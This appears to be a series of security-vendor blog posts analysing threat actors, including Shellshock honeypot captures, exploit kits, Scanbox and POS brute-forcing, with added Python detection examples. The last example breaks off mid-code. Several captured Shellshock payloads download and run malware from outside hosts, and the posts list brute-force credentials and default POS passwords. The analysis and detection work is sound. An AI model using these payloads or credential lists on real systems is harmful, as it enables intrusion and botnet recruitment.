Posted 6 months ago
Yesterday, another cyber espionage group with Russian roots made it to the New York Times headlines again courtesy of FireEye and a new report they published.

FireEye did a good job on attribution and provided some technical indicators; however, they neglected to reference previous work on this threat actor from companies such as PwC, Trend Micro, ESET and others.

We have been tracking this threat actor (Sofacy) for a few years, since it first appeared on our radar in one of the CVE-2012-0158/CVE-2010-3333 clusters. Based on the lure content of the malicious documents, as well as the phishing campaigns we have seen in the past, this group tends to target NATO, Eastern European government and military institutions, and defense contractors. We have seen lures related to Ukraine, Chechnya and Georgia, which indicates that one of the group's objectives is gathering geopolitical intelligence.

The techniques used by this group have evolved over the years.

- Spearphishing

Most of the Spearphishing campaigns launched by this group involve a malicious Word document exploiting one of the following vulnerabilities:

CVE-2010-3333
CVE-2012-0158
CVE-2014-1761

As described by FireEye and others, this group uses different payloads, including a downloader and several second-stage backdoors and implants.

We cover these tools using the following rules with USM:

System Compromise, Targeted Malware, OLDBAIT - Sofacy
System Compromise, Targeted Malware, Chopstick - Sofacy
System Compromise, Targeted Malware, Coreshell - Sofacy
System Compromise, C&C Communication, Sofacy Activity

- Web compromises

The group has been seen infecting websites and redirecting visitors to a custom exploit kit that exploits the following vulnerabilities in Internet Explorer:

CVE-2013-1347
CVE-2013-3897
CVE-2014-1776

The following rule detects activity related to this exploit kit:

Exploitation & Installation, Malicious website - Exploit Kit, Sednit EK

- Phishing campaigns

This actor uses phishing campaigns to redirect victims to Outlook Web Access (OWA) portals designed to impersonate the legitimate OWA site of the victim's company. This technique is used to compromise credentials and access mailboxes and other services within the company.

Inspecting the content of the malicious redirect we can alert on this activity using the following rule:

Delivery & Attack, Malicious website, Sofacy Phishing

References:

[1] http://pwc.blogs.com/files/tactical-intelligence-bulletin---sofacy-phishing-.pdf
[2] http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-the-red-in-sednit/
[3] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf
[4] http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/
[5] http://malware.prevenity.com/2014/08/malware-info.html
[6] http://www.fireeye.com/resources/pdfs/apt28.pdf

Posted 7 months ago
Yesterday, a new vulnerability affecting Bash (CVE-2014-6271) was published. It allows attackers to execute arbitrary commands by appending them to a function definition stored in an environment variable; bash runs the trailing commands when it imports the variable. It affects Bash (the Bourne Again SHell), the default command shell for Linux and other UNIX flavors including Mac OS X. The vulnerability is critical because it is exposed by web servers that use mod_cgi or code that calls the bash shell. Other systems that are probably affected are network services and daemons that run shell scripts with attacker-influenced environment variables.

Yesterday we began running a new module in our honeypots, waiting for attackers to exploit this vulnerability.

We have had several hits in the last 24 hours. Most of them are scanners checking whether the system is vulnerable; they simply send a ping command back to the attacker's machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -

referer, () { :; }; ping -c 11 209.126.230.74

122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200 -

89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200

user-agent, () { :;}; /bin/ping -c 1 198.101.206.138
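As an added example (not code from the original post), the following Python snippet applies the detection logic implied by the hits above and by the Perl-bot request further down: it looks for a bash function export ("() { ... };") in any request header, maps the header to the HTTP_* environment variable mod_cgi would create for it, and classifies the trailing command as a scanner probe or a malware dropper. The sample headers are constructed for the example, modelled on the post's honeypot lines, with RFC 5737 documentation addresses standing in for the attacker hosts.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Shellshock (CVE-2014-6271): mod_cgi exports request headers as HTTP_*
# environment variables (RFC 3875); a vulnerable bash importing a variable
# whose value starts with "() {" also executes whatever follows the "};".
FUNCTION_EXPORT = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<trailer>.+)$")
URL_RE = re.compile(r"https?://[^\s;'\"]+")
DOWNLOADERS = {"wget", "curl"}


@dataclass
class Hit:
    header: str       # request header carrying the payload
    env_var: str      # variable name mod_cgi would have exported
    command: str      # what bash would execute
    kind: str         # "probe", "dropper" or "other"
    urls: List[str]   # download URLs found in the command


def cgi_env_name(header: str) -> str:
    """Header name -> CGI meta-variable name, e.g. User-Agent -> HTTP_USER_AGENT."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def classify(command: str) -> str:
    """Droppers fetch a second stage; scanners usually just ping home."""
    basenames = {t.rsplit("/", 1)[-1] for t in command.replace(";", " ").split()}
    if basenames & DOWNLOADERS:
        return "dropper"
    if "ping" in basenames:
        return "probe"
    return "other"


def parse_header(header: str, value: str) -> Optional[Hit]:
    """Return a Hit if the header value carries a bash function export."""
    m = FUNCTION_EXPORT.search(value)
    if not m:
        return None
    cmd = m.group("trailer").strip()
    return Hit(header, cgi_env_name(header), cmd, classify(cmd), URL_RE.findall(cmd))


def triage(headers: List[Tuple[str, str]]) -> List[Hit]:
    """Run every (name, value) header pair through parse_header and keep the hits."""
    return [h for h in (parse_header(n, v) for n, v in headers) if h]


# Constructed sample headers (not a live feed), modelled on the honeypot hits
# in the post; RFC 5737 addresses stand in for the attacker hosts.
SAMPLE_HEADERS = [
    ("Referer", "() { :; }; ping -c 11 192.0.2.10"),
    ("User-Agent", "() { :;}; /bin/ping -c 1 198.51.100.5"),
    ("Cookie", "() { :; }; wget -O /tmp/besh http://203.0.113.7/nginx; chmod 777 /tmp/besh; /tmp/besh;"),
    ("User-Agent", '() { :;}; /bin/bash -c "cd /tmp;curl -O http://203.0.113.9/jur ; perl /tmp/jur;rm -rf /tmp/jur"'),
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_HEADERS):
        print(f"{hit.env_var:<16} {hit.kind:<8} {hit.command}  urls={hit.urls}")
```

The regex keys on the function body rather than on a fixed string such as "() { :;}", because the body between the braces is attacker-controlled and varies between scanners; the download URLs it extracts are the indicators worth pivoting on.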

Apart from those hits we have found two attackers that are using the vulnerability to install two different pieces of malware on the victims.

The first one downloads and executes an ELF binary:

Cookie, () { :; }; wget /tmp/besh http://162.253.66[.]76/nginx; chmod 777 /tmp/besh; /tmp/besh;

MD5 (nginx) = 5924bcc045bb7039f55c6ce29234e29a

nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped

If we take a look at the binary, we can see that it tries to gather information about the system, such as the number of CPUs, network configuration, etc.

It also contains the following code:

/bin/busybox;echo -e '\147\141\171\146\147\164'

This is used to fingerprint honeypots, as described here:

https://isc.sans.edu/diary/Busybox+Honeypot+Fingerprinting+and+a+new+DVR+scanner/18055

The sample opens a connection to a C&C server on 89.238.150.154 port 5. It supports the following commands:

PING
GETLOCALIP
SCANNER
HOLD
JUNK (DoS Flood)
UDP (DoS Flood)
TCP (DoS Flood)
KILLATTK
LOLNOGTFO

The following usernames/passwords are hardcoded in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

This list is probably used to perform brute force attacks.

There is another sample (apache) downloaded from the same server:

MD5 (apache (1)) = 371b8b20d4dd207f7b3f61bb30a7cb22

It contains the same code but uses a different C&C server, 162.253.66.76 port 53.

You can use the following Yara rule to detect the Linux bot:

rule bashWorm {
       strings:
               $a = "JUNK Flooding %s:%d for %d seconds."
               $a2 = "UDP Flooding %s for %d seconds."
               $a3 = "UDP Flooding %s:%d for %d seconds."
               $a4 = "TCP Flooding %s for %d seconds."
               $a5 = "KILLATTK"
               $a6 = "REPORT %s:%s:"
               $a7 = "PING"
               $a8 = "PONG!"
               $a9 = "GETLOCALIP"
       condition:
               all of them
}

Perl bot

Apart from that piece of malware, our honeypot received another interesting attack a few hours ago:

User-Agent, "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

The file is a Perl script with MD5 0763b8c00d6862d2d0f8f980de065857.

It appears to be a repurposed IRC bot that connects to an IRC server and waits for commands.

Once running, the Perl script shows up in the process list under the name of a system daemon, /usr/sbin/atd:

root     17720 81.1  0.0  24848  4140 ?        R    17:52   0:04 /usr/sbin/atd

As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443, it joins the following channel, supplying a channel key (ddosit):

  JOIN #new ddosit.

3810-  51 |PHP|3551 :There are 1 users and 715 invisible on 1 servers..

That suggests 715 users (probably victims) were connected to the server at that moment.

As soon as new victims join the server, the attackers run "uname -a" to determine the operating system running on the victim, and "id" to check the current user.

Since our honeypot joined the server, more than 20 new victims have become part of the botnet. Some examples are:

 Linux xxx.321webhosting.biz 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux..
 Linux xxx.mydreamads.com 2.6.18-308.1.1.el5xen #1 SMP Wed Mar 7 05:38:01 EST 2012 i686 i686 i386 GNU/Linux..
 Darwin cisco 13.3.0 Darwin Kernel Version 13.3.0: Tue Jun  3 21:27:35 PDT 2014; root:xnu-2422.110.17~1/RELEASE_X86_64 x86_64..
 Linux xxx.servlinux.net 2.6.32-431.20.3.el6.x86_64 #1 SMP Thu Jun 19 21:14:45 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux..
 Linux xxx.hostforleads.com 2.6.32-279.14.1.el6.i686 #1 SMP Tue Nov 6 21:05:14 UTC 2012 i686 i686 i386 GNU/Linux..
 Linux xxx.tekburst.com 3.2.62-74.art.x86_64 #1 SMP Fri Sep 12 09:46:02 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux..
 Linux Mitel5kps 2.6.36 #1 Thu Aug 11 00:23:48 GMT 2011 i686 GNU/Linux..
 Linux Mitel5000 2.6.22.19-4.03.0-mitel_acp5000 #2 Fri Mar 28 05:00:24 MST 2014 armv6l GNU/Linux..
 Darwin Discovery.local 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64..
 PHP 5.4.30 (cli) (built: Jul 29 2014 23:43:29) Zend Engine v2.4.0, Copyright (c) 1998-2014
 Linux antares 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:01 UTC 2014 i686 athlon i686 GNU/Linux..
 Linux cs94.XXX.com 2.6.9-89.0.16.plus.c4smp #1 SMP Tue Nov 3 18:15:39 EST 2009 i686 i686 i386 GNU/Linux..

The attackers appear to be Romanian speakers as we can see in the following messages that we have seen in the IRC server:

  :x!x@localhost PRIVMSG #new :EU MAI STIU FRATE ?
  :JB!JB@localhost PRIVMSG #new :ma duc pana jos..
  :x!x@localhost PRIVMSG #new :ca se inverzeste ecranu..
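The IRC traffic quoted above (the JOIN with its channel key, the 251 numeric that gives away the bot population, and the operators' PRIVMSGs) is easy to pick apart with a small parser. The following Python is an added example, not code from the original post: it parses raw IRC lines, summarises a session, and checks whether a client-to-server stream on port 443 opens with IRC registration rather than a TLS handshake, which is exactly what this bot does. The session is constructed for the example from the lines in the post; the 251 numeric is rebuilt in its standard form with a made-up server name.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Minimal RFC 1459 message parser: "[:prefix] COMMAND [params] [:trailing]".
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<command>\S+)(?:\s+(?P<params>[^:]*?))?(?:\s*:(?P<trailing>.*))?$"
)
# RPL_LUSERCLIENT (251) gives the server population; bots sit "invisible".
LUSERS = re.compile(r"There are (?P<visible>\d+) users and (?P<invisible>\d+) invisible")
# Commands a client sends first when registering a connection.
REGISTRATION = {"PASS", "NICK", "USER", "CAP"}


def parse_irc_line(line: str) -> Optional[Dict[str, object]]:
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    return {
        "prefix": m.group("prefix"),
        "command": m.group("command").upper(),
        "params": (m.group("params") or "").split(),
        "trailing": m.group("trailing"),
    }


def looks_like_plaintext_irc(payload: bytes) -> bool:
    """True if a client->server stream opens with IRC registration instead of TLS."""
    if payload[:1] == b"\x16":  # TLS handshake record: what real HTTPS starts with
        return False
    first = payload.split(b"\r\n", 1)[0].decode("ascii", "replace")
    msg = parse_irc_line(first)
    return bool(msg) and msg["command"] in REGISTRATION


def summarize_session(lines: List[str]) -> Dict[str, object]:
    """Channels joined (with key), server population, and who issues PRIVMSGs."""
    channels: Dict[str, Optional[str]] = {}
    speakers = set()
    population = None
    commands: Counter = Counter()
    for line in lines:
        msg = parse_irc_line(line)
        if not msg:
            continue
        commands[msg["command"]] += 1
        params = msg["params"]
        if msg["command"] == "JOIN" and params:
            channels[params[0]] = params[1] if len(params) > 1 else None
        elif msg["command"] == "251" and msg["trailing"]:
            m = LUSERS.search(msg["trailing"])
            if m:
                population = int(m.group("visible")) + int(m.group("invisible"))
        elif msg["command"] == "PRIVMSG" and msg["prefix"]:
            speakers.add(msg["prefix"].split("!", 1)[0])  # nick part of nick!user@host
    return {"channels": channels, "population": population,
            "speakers": speakers, "commands": commands}


# Constructed session (not a raw capture), modelled on the lines quoted in
# the post; irc.example.net is a made-up server name.
SAMPLE_SESSION = [
    "NICK |PHP|3551",
    "USER php 8 * :php",
    "JOIN #new ddosit",
    ":irc.example.net 251 |PHP|3551 :There are 1 users and 715 invisible on 1 servers",
    ":x!x@localhost PRIVMSG #new :EU MAI STIU FRATE ?",
    ":JB!JB@localhost PRIVMSG #new :ma duc pana jos",
    ":x!x@localhost PRIVMSG #new :ca se inverzeste ecranu",
]

if __name__ == "__main__":
    print(summarize_session(SAMPLE_SESSION))
```

The port-443 check is the cheap network-side detection here: a TLS client hello always begins with record type 0x16, so a 443 flow whose first bytes are NICK or USER is plaintext IRC hiding on a port most egress filters leave open.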

We will be updating the blog post as we discover more information about these threats.

Thanks to Eduardo de la Arada from the labs team for assisting on the analysis of the Linux bot.

Posted 8 months ago
We have previously described how Exploit Kits are among the favorite tools cybercriminals use to install malicious software on victims' systems.

The number of Exploit Kits available has grown rapidly in the last few years. Since Blackhole's author was arrested in 2013, new kits have kept appearing, including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf at Emerging Threats.

Archie is a very basic Exploit Kit that uses exploit modules copied from the Metasploit Framework. When the victim lands on the main page, Archie uses the PluginDetect JavaScript library to extract the Flash, Silverlight and Acrobat Reader versions, and sends that information to the server.

It also uses a trick, documented in our previous blog posts, to check whether or not the system is running a 64-bit version of Internet Explorer.

Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including:

Filename         CVE            Affected Software   MD5
flashlow.swf     CVE-2014-0497  Flash               4f3f7b896ab69ec2c082709220000b38
flashhigh.swf    CVE-2014-0515  Flash               18e0629ba830f0894268aa1dca92ea78
silverapp1.xap   CVE-2013-0074  Silverlight         f1759371fe6c7f46ca3c82edd456eca2
iebasic.html     CVE-2013-2551  Internet Explorer   e9fbd007f6fa2f188c090f535da7ca4a

Archie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them.

If we disassemble the shellcode we can see it is a basic download and execute payload.

4010bb     LoadLibraryA(urlmon)
401089     VirtualAlloc(base=0 , sz=400) = 60000
4010ce     GetTempPath(len=104, buf=60000) = 14
4010a7     URLDownloadToFile(http://IPADDRESS:PORT/dd, C:\users\user\Temp\e.dll)
401108     LoadLibraryA(C:\users\user\Temp\e.dll)
401114     Sleep(0x3a98)

The shellcode downloads a DLL from the webserver, writes it in \Users\[Current_user]\Temp\e.dll and then loads it.

The IP address hosting the Archie Exploit Kit, and the malware it delivers, are also used for click fraud operations, related to the research on the click fraud bot published by Kimberly.

Following is the list of hashes that we have found connecting to the same C&C:

17b077840ab874a8370c98c840b6c671
7bd2207dcef1878109e88a4527162d09
89c136eae9163d63918e0ef59bd6ac82
d1b11795c3e3736de834abc39f7bd76a
1d648b48d1e2b0f2855e2659f32c94ad
48feab46efc26519820e5b8a9152e529
e54d5fef5e3c050f529e814dca4d8014
83f5aef0de9da8cb813c5c8ffbaf1ead
b47739296783ac7fced9ccb49c833ae8
09102b0fe2be8b85136d454b14ec7398
dbcb2d297e5d79c5a161801b2be775ba
30b729137b5ee8805e3e9cc1dbb75609
a615334472c30ee680f798e3849def66
8268f911c87a33f29c00af1dd2c1c2a6
389c5931703a031faebf5f5406f86752
2da11eb62f514abc2ea68271655cb791

Posted 8 months ago
A few days ago we detected a watering hole campaign on a website owned by a large industrial company.

The website is related to software used for simulation and systems engineering in a wide range of industries, including automotive, aerospace, and manufacturing.

The attackers were able to compromise the website and include code that loaded a malicious JavaScript file from a remote server. This JavaScript file is a reconnaissance framework that the attackers call "Scanbox", and it includes some of the techniques we described in a previous blog post: Attackers abusing Internet Explorer to enumerate software and detect security products

The Scanbox framework first configures the remote C&C server that it will use and collects a small amount of information about the victim that is visiting the compromised website including:

Referer
User-Agent
Location
Cookie
Title (to identify the specific content the victim is visiting)
Domain
Charset
Screen width and height
Operating System
Language

Resulting in something like this:

Before sending the information to the C&C server, Scanbox encodes and encrypts the data with the following function:

Producing the following request:

If we decrypt the data it translates to:

After the first request, the framework contains several plugins to extract different information from the victim.

Pluginid 1: Enumerates software installed in the system using the technique we explained before that affects Internet Explorer. It also checks if the system is running different versions of EMET (Enhanced Mitigation Experience Toolkit):

Producing the list of security software on the target

Pluginid 2: Enumerates Adobe Flash versions

Pluginid 5: Enumerates Microsoft Office versions

Pluginid 6: Enumerates Acrobat Reader versions

Pluginid 8: Enumerates Java versions

Pluginid 21: Implements a "keylogger" through JavaScript that logs all the keystrokes the victim types inside the compromised website.

While the user is browsing the compromised website, all keystrokes are recorded and sent to the C&C periodically. It also sends the keystrokes when the user submits web forms, which can include passwords and other sensitive data.

As we have seen, this is a very powerful framework that gives attackers a lot of insight into potential targets, which will help them launch future attacks against them.

We have also seen several Metasploit-produced exploits that target different versions of Java in the same IP address that hosts the Scanbox framework (122.10.9[.]109).

We recommend you look for this type of activity against the following machines in your network:

mail[.]webmailgoogle.com
js[.]webmailgoogle.com
122[.]10.9.109
Posted 10 months ago
During the last few years we have seen an increase in the number of malicious actors using tricks and browser vulnerabilities to enumerate the software running on the victim's system through Internet Explorer.

In this blog post we describe some of the techniques attackers are using to perform reconnaissance that gives them information for future attacks. We have also seen these techniques used to decide whether or not to exploit the victim, based on the detected antivirus, the versions of potentially vulnerable software, or the presence of certain security features such as the Enhanced Mitigation Experience Toolkit (EMET). EMET is a Microsoft tool that applies exploit mitigations to prevent vulnerabilities from being successfully exploited. This makes life harder for attackers, so they prefer to avoid it.

1. Abusing res://

The first technique we describe affects Internet Explorer 8 and earlier. Internet Explorer blocks attempts to access the local file system using "file://", but it used to be possible to load image files stored in the resource section of a DLL/EXE through "res://". In a previous blog post we mentioned how attackers used this technique as part of a watering hole campaign affecting a Thai NGO. In that case we found the following code in the HTML of the affected website:

The resList array contains a list of executable files with resource sections containing an image file. An example using explorer.exe:

 {id: 'Windows Explorer', res: 'res://explorer.exe/#2/#143'}

If we take a look at the resource sections present in explorer.exe we can find a resource named 143.

The resList array contains a long list of executable files that is used to detect antivirus software and VMware (probably to check whether it is an analysis machine used by a security researcher):

The complete list of detected software is:

 Webroot
 Sophos
 Microsoft Security Client
 F-Secure
 BitDefender
 Norton Antivirus
 McAfee Antivirus
 Kingsoft Antivirus
 Avira Antivirus
 Kaspersky Antivirus
 360 AV
 ESET NOD32
 Trend Micro Internet Security
 Rising Antivirus
Vmware Player
Vmware Tools

We found similar code being used by the Sykipot actors in combination with a phishing scheme. In that case the list of software was much longer and it detected common software along with security products:

The list of detected software:

Microsoft Office (all versions)
WPS (Kingsoft Office)
Winrar
Winzip
7z
Adobe Reader (all versions)
Skype
Microsoft Outlook (all versions)
Yahoo Messenger (all versions)
Flashget
Thunder
Emule
Serv-U
RAdmin
UltraVNC
pcAnywhere
RealVNC
Fetion
Google Talk
AliIM
POPO
ICQLite
ICQ
Tencent Messenger
Sina UC
QQ
BaihI
AIM
Microsoft Messenger
Windows Live MSN
Windows Media Player (all versions)
SSReader
PPStream
Storm Player
TTPlayer
Haojie SuperPlayer
Winamp
KuGoo
UltraEdit
Sylpheed
ACDSee
Photoshop
Foxmail
Gmail Notifier
Windows Live Mail
Adobe Media Player
Flash CS
Dreamweaver
Fireworks
Delphi
Java
VMware Tools
Tracks Eraser
Microsoft Virtual PC
VMware
Microsoft ActiveSync
Microsoft .NET
PGP
CCClient
DriverGenius
Daemon Tools
MagicSet
Baidu Tool
Foxit Reader
MySQL Server (all versions)
SQLyog
Firefox
World IE
TT IE
Google Chrome
Maxthon
360 IE
Opera
Safari
SaaYaa
GreenBrowser

Security software detected:

Microsoft Security Essentials
AVG
360
SSM
Keniu
ESET
NOD32
Skynet Firewall
Kingsoft
Norton
Rising AV
Kaspersky
JingMin kav
Mcafee
BitDefender
AntiVir
TrendMicro
Avira
Dr Web
Avast
Sophos
Zone Alarm
Panda Security

They also used this code snippet to detect Adobe Acrobat Reader (English, Chinese and Taiwanese.)

Finally they were also able to list the patches that were installed in the Microsoft platform using a predefined list of patch numbers:

2. Microsoft XMLDOM ActiveX control information disclosure vulnerability

Another technique we found is used by the Deep Panda actors. They usually use this code in watering hole campaigns to detect specific software installed on the intended victim's system. It abuses the XMLDOM ActiveX control to check for the presence of multiple files and folders:

This vulnerability was disclosed last year and it affects Internet Explorer versions 6 through 11 running on Windows through version 8.1.

Software enumerated includes most of the Antivirus and endpoint security products on the market:

7z
AhnLab_V3
BkavHome
Java
COMODO
Dr.Web
ESET-SMART
ESTsoft
F-PROT
F-Secure
Fortinet
IKARUS
Immunet
JiangMin
Kaspersky_2012
Kaspersky_2013
Kaspersky_Endpoint_Security_8
Mse
Norman
Norton
Nprotect
Outpost
PC_Tools
QuickHeal
Rising
Rising_firewall
SQLServer
SUPERAntiSpyware
Sunbelt
Symantec_Endpoint12
Trend2013
ViRobot4
VirusBuster
WinRAR
a-squared
antiyfx
avg2012
bitdefender_2013
eScan
eset_nod32
f-secure2011
iTunes
mcafee-x64
mcafee_enterprise
north-x64
sophos
symantec-endpoint
systemwaler
systemwaler-cap
trend
trend-x64
var justforfunpath
vmware-client
vmware-server
winzip

3. More XMLDOM vulnerabilities

At the beginning of the year we found a different method being used in combination with a zero-day vulnerability affecting Internet Explorer (CVE-2014-0322) targeting the French Aerospace Association. In that case we found the following code snippet.

The attackers were using a similar technique to detect whether EMET was present on the system. If EMET was detected they did not trigger the exploit, since EMET was able to block it and alert the user, which would have burned the 0-day and diminished the attackers' effectiveness.

A month after the exploit code was made public we detected the same technique being used in the Angler Exploit Kit. They were using it to detect Kaspersky Antivirus.

In recent samples of the Angler Exploit Kit we have seen an improved version where they added detection for TrendMicro products.
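The three enumeration patterns described in this post (res:// references to resource sections of local executables, the XMLDOM ActiveX control used to probe local paths, and checks for EMET) are all visible in the page source that reaches the browser, so a defender who captures web content can triage it statically. The following is an added example, not code from the original post or from any of the actors or kits it describes: a small Python routine that scans captured HTML/JavaScript for those indicators and returns a verdict. The sample pages, the product-name list, the regular expressions and the thresholds are all constructed for this example; only the `res://explorer.exe/#2/#143` entry and the product names come from the post.

```python
"""
Static triage of captured web content for the browser-side software
enumeration tricks described in the post: res:// probes of resource sections
in local executables, XMLDOM ActiveX checks against local paths, and checks
for EMET. The sample pages, product-name list, patterns and thresholds are
constructed for this example; they are not the post's own signatures.
"""
import re

# Product names that recur in the enumeration lists quoted in the post. A script
# naming several of them next to local paths or res:// URIs is worth a look.
SECURITY_PRODUCT_NAMES = [
    "kaspersky", "mcafee", "symantec", "norton", "trend", "sophos", "eset",
    "nod32", "bitdefender", "avira", "avg", "f-secure", "comodo", "rising",
    "kingsoft", "emet", "vmware",
]

# res://<executable>/#<type>/#<id> references, as in the resList entries.
RES_URI = re.compile(r"res://[\w.\-]+\.(?:exe|dll)/#?\d+/#?\d+", re.IGNORECASE)
# Instantiation of the XMLDOM ActiveX control from script.
XMLDOM_OBJ = re.compile(
    r"ActiveXObject\(\s*['\"](?:Microsoft\.XMLDOM|Msxml2\.DOMDocument[^'\"]*)['\"]\s*\)",
    re.IGNORECASE)
# Local Windows paths (escaped or not) such as C:\Program Files\...
LOCAL_PATH = re.compile(
    r"\b[A-Za-z]:(?:\\\\|\\|/)(?:Program Files|Windows|ProgramData)", re.IGNORECASE)


def triage_script(source):
    """Return the indicators found in one page or script and a verdict."""
    low = source.lower()
    findings = {}
    res_hits = RES_URI.findall(source)
    if res_hits:
        findings["res_uri_probes"] = len(res_hits)
    if XMLDOM_OBJ.search(source):
        n_paths = len(LOCAL_PATH.findall(source))
        if n_paths:
            findings["xmldom_local_path_probes"] = n_paths
    products = [p for p in SECURITY_PRODUCT_NAMES
                if re.search(r"(?<!\w)" + re.escape(p), low)]
    if products:
        findings["security_products_named"] = products
    if "emet" in products:
        findings["emet_check"] = True
    suspicious = (findings.get("res_uri_probes", 0) >= 2
                  or findings.get("xmldom_local_path_probes", 0) >= 1
                  or len(products) >= 3)
    findings["verdict"] = "suspicious" if suspicious else "clean"
    return findings


# Constructed sample pages (not captured from any real site).
BENIGN_PAGE = """
<script>
  var s = document.createElement('script');
  s.src = 'https://example.invalid/analytics.js';
  document.head.appendChild(s);
</script>
"""

# Mirrors the resList shape quoted in the post; executables other than
# explorer.exe and their resource ids are placeholders.
RES_PROBE_PAGE = """
<script>
var resList = [
  {id: 'Windows Explorer', res: 'res://explorer.exe/#2/#143'},
  {id: 'Kaspersky Antivirus', res: 'res://sample_av_tray.exe/#2/#100'},
  {id: 'ESET NOD32', res: 'res://sample_av_ui.exe/#2/#101'},
  {id: 'Vmware Tools', res: 'res://sample_vm_tools.exe/#2/#102'}
];
</script>
"""

# XMLDOM control created next to a list of local product folders to probe;
# checkPath is a placeholder for whatever routine such a script would use.
XMLDOM_PROBE_PAGE = """
<script>
var dom = new ActiveXObject("Microsoft.XMLDOM");
var probes = ["C:\\\\Program Files\\\\Kaspersky Lab\\\\",
              "C:\\\\Program Files\\\\Trend Micro\\\\",
              "C:\\\\Program Files\\\\EMET\\\\",
              "C:\\\\Program Files\\\\McAfee\\\\"];
for (var i = 0; i < probes.length; i++) { checkPath(dom, probes[i]); }
</script>
"""

if __name__ == "__main__":
    for name, page in [("benign", BENIGN_PAGE), ("res-probe", RES_PROBE_PAGE),
                       ("xmldom-probe", XMLDOM_PROBE_PAGE)]:
        print(name, triage_script(page))
```

The thresholds are deliberately loose: a single res:// reference or one product name appears in plenty of legitimate pages, but a list of them, or an XMLDOM object sitting next to a list of `Program Files` paths, has no ordinary reason to exist in web content and is what the post's samples have in common. Run the routine over proxy-captured or sandbox-captured pages rather than live sites.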

In this blog post we have given an overview of the different techniques attackers are using to enumerate software running on a remote system. These techniques can give attackers information that they can use in future attacks to exploit certain vectors based on the software running (or not running) on a system. In addition, we've illustrated ways in which cybercriminals have adapted and copied techniques used by more advanced attackers for their own purposes.

References:

Vulnerability in Internet Explorer 10.1

XMLDOM vulnerability

URI Use and Abuse

Angler Exploit Kit 

Posted about 1 year ago
Every single day our automated systems analyze hundreds of thousands of malicious samples. Yesterday one of the samples caught my attention because the malware started performing bruteforce attacks against Remote Desktop using certain usernames and passwords.

MD5: c1fab4a0b7f4404baf8eab4d58b1f821

Other similar samples:
c0c1f1a69a1b59c6f2dab18135a73919 
08863d484b1ebe6359144c9a8d8027c0

Once started, the malware copies itself to \Documents and Settings\Administrator\Application Data\lsacs.exe and starts communicating with the C&C, sending data about the status of the bot (number of hosts bruteforced, packets per second, number of threads, version, etc.).

The server replies with a configuration block containing:

- Login/Password list to use during bruteforcing

- Timestamp

- List of IP Addresses to attack

- Number of threads to use

- Interval 

As you can see, some of the usernames/passwords they are using (pos, pos1, pos01, shop, station, hotel, atm, atm1, micros, microssvc) are the defaults commonly used on Point of Sale terminals by retailers and businesses all around the world.

The control panel of the botnet is also hosted in the same server:

This is not new; we know cybercriminals have been using this technique to compromise Point of Sale systems for years. Once they gain access to the terminal using one of the default credentials, they upload a second-stage payload commonly known as a memory scraper, a piece of malware that searches for credit card data in memory before it has been encrypted. Some examples are:

- BlackPOS

- Decebal

- VSkimmer

- Alina

- RetalixScrapper

- Dexter

These pieces of malware are able to extract the credit card data from the terminal and exfiltrate it to the attackers, who then sell the information on the black market.

When it comes to detecting the infection of a system in your network, this is how our AlienVault Unified Security Management (USM) will detect a compromised asset in your network:


USM is able to detect both the communication with the C&C server and the network activity that is generated when the malware performs bruteforce attacks against devices on the Internet. It is worth mentioning that the C&C server IP address was already in our Open Threat Exchange database, and the correlation engine used that information to generate an alarm about a system compromise.
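The brute-force side of this activity is also visible on the receiving end, in the Windows Security log of any RDP-exposed host. The following is an added example, not USM's own correlation logic and not code from the original post: a small Python detector that reads failed-logon events, counts failures per source address inside a sliding window, and separately flags any attempt against one of the default POS account names quoted above, since even a single failure against such a name is worth a look on a POS network. The event lines are constructed in a simplified key=value form and are not real telemetry; the threshold and window are assumptions chosen for the example.

```python
"""
RDP brute-force detector over Windows Security events (constructed sample).

Counts failed logons (Event ID 4625, logon type 10 = RemoteInteractive/RDP)
per source address inside a sliding window and flags sources that reach a
threshold. It also flags any attempt that uses one of the default POS account
names mentioned in the post (pos, pos1, pos01, shop, station, hotel, atm,
atm1, micros, microssvc).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Default POS account names quoted in the post; used as a high-signal indicator.
DEFAULT_POS_ACCOUNTS = {"pos", "pos1", "pos01", "shop", "station", "hotel",
                        "atm", "atm1", "micros", "microssvc"}

# Constructed sample events in a simplified key=value form (not real telemetry).
SAMPLE_EVENTS = """\
2014-03-13T10:00:01 EventID=4625 LogonType=10 TargetUser=pos SourceIP=198.51.100.7
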